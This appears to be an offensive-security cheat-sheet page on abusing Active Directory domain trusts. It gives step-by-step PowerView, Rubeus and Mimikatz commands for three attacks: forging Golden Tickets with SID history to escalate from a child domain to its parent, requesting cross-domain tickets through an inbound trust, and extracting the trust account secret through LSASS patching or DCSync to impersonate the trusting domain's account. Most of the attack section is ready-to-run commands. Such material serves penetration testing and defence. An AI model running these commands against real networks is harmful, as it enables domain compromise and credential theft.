Trust Relationship Abuse

Vulnerability
Prerequisites
Exploit

Vulnerability

Let’s assume a trust relationship between two domains A and B being A trust B. If you are Domain Admin in at least one of these two domains, you can gain access - even Domain Admin rights - in the other one. The exploit will depend on the trust direction.

Prerequisites

Being Domain Admin in a domain involved in a trust relationship.

Exploit

Parent trust relationship

Let’s assume you are Domain Admin in domain A which is the child of domain B, both in the same forest. In this case, you can leverage SID history to gain Domain Admin access in parent domain B. To do so, you can forge Golden or Diamond tickets for the parent directory.

The Golden ticket must be forged for a user that exists in both parent and child domain. Targeting Administrator Domain Admin is a good start.

# Get SID of the target group - Domain Admin for sure - in the parent domain.
Get-DomainGroup -Identity "Domain Admins" -Domain $ParentDomainFQDN -Properties ObjectSid

# Get SID of the child - current - domain you are in.
Get-DomainSID

# Forge a Golden Ticket using previous ObjectSid.
Rubeus.exe golden /user:$Username /aes256:$Hash /domain:$ChildDomainFQDN /sid:$ChildDomainSid /sids:$TargetGroupSID /nowrap

Import the ticket in your session to gain Domain Admin access to the parent domain.

Inbound trust relationship

Let’s assume you are Domain Admin in domain B. Therefore, you can enumerate domain A by leveraging the trust. First, use PowerView to list group members outside the target domain.

# Get group members SID (MemberName attribute).
Get-DomainForeignGroupMember -Domain $DomainAFQDN

To perform this exploit, previous command must returns something. It’s even better if it reterns a privileged domain user or group.

# Resolve SID of MemberName.
ConvertFrom-SID $MemberName

# If this SID corresponds to a domain group, get members.
Get-DomainGroupMember -Identity "$GroupName" | select MemberName

At this point, you have a username in domain B that is member of a group - Domain Admin, I cross fingers for you - in domain A.

# Request a TGT for the user.
./Rubeus.exe asktgt /user:$Username /domain:$DomainBFQDN /aes256:$Hash /nowrap

# Request a krbtgt TGS for the target domain (mandatory step).
./Rubeus.exe asktgs /service:krbtgt/$DomainAFQDN /domain:$DomainBFQDN /dc:$DomainBControllerFQDN /ticket:$TGTBase64Ticket /nowrap

# Request any service TGS for the target domain using previous TGS.
./Rubeus.exe asktgs /service:cifs/$DomainAFQDN /domain:$DomainAFQDN /dc:$DomainAControllerFQDN /ticket:$TGSBase64Ticket /nowrap

You can pass the ticket into a new session and access the targeted service.

Note that in the case you are facing 3 domains with transitive relationships (A -> B -> C), if you are Domain Admin in domain C, you can leverage SID History to directly escalate your privileges in domain A.

Outbound trust relationship

Let’s assume you are Domain Admin in domain A. With A trust B relationship, you can’t enumerate domain B but you can still gain a low privilege access to the domain by stealing the shared password contained in the Trusted Domain Object (TDO).

First way to do that is extracting the secret directly from domain A controllers’ LSASS with Mimikatz.

This method is dangerous because it performs memory patching. It could cause a crash or a memory corruption of the domain controller.

lsadump::trust /patch

Second - and recommended - way to do it is by performing [DCSync] attack with the TDO.

./ADSearch.exe --search "(objectCategory=trustedDomain)" --domain $DomainAFQDN --attributes distinguishedName

# Get the Trust Domain Object GUID.
Get-DomainObject -Identity "$DomainBDistinguishedName" | select ObjectGuid

# With Mimikatz.
lsadump::dcsync /domain:$DomainAFQDN /guid:{$TrustDomainObjectGUID} 

The secret that we want is [Out].rc4_hmac_nt. Now, you must consider that an account is created in every trusted domain corresponding to the NETBIOS name of the trusting one. In our case, domain B should contain a user named something like DOMAINA$. This is the user we are going to impersonate with the previously recovered secret.

./Rubeus.exe asktgt /user:$NetBiosDomainA /domain:$domainB /rc4:$rc4_hmac_nt /nowrap

You can now use this previous TGT to access domain B. Time for a domain enumeration, right?